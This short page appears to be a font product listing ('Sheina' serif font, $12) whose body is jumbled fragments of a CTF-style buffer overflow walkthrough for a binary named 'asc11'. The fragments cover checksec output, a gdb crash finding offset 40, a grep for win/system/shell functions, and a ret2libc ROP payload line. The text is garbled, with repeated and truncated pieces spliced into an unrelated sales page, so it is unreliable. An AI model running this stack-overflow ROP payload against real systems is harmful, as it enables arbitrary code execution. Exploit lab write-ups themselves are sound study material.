Sheina || Elegant Serif Font
$12
objdump -d asc11 | grep -E "win|system|shell" If none, we need ret2libc.
gdb ./asc11 r < <(python3 -c "print('A'*50)") Crash at RIP = 0x4141414141414141 → offset 40. Check if there’s a win or shell function: asc 11
payload = b'A'*offset + rop.chain() p.sendlineafter(b'Input: ', payload) objdump -d asc11 | grep -E "win|system|shell" If
asc11: ELF 64-bit, dynamically linked, not stripped Arch: amd64 RELRO: Partial Stack: No canary found NX: Enabled PIE: Disabled Run it to see behavior: payload) asc11: ELF 64-bit
./asc11 It prints "Input: " , waits for input, then exits. Open in Ghidra/IDA. The main function:
file asc11 checksec asc11 Output (example):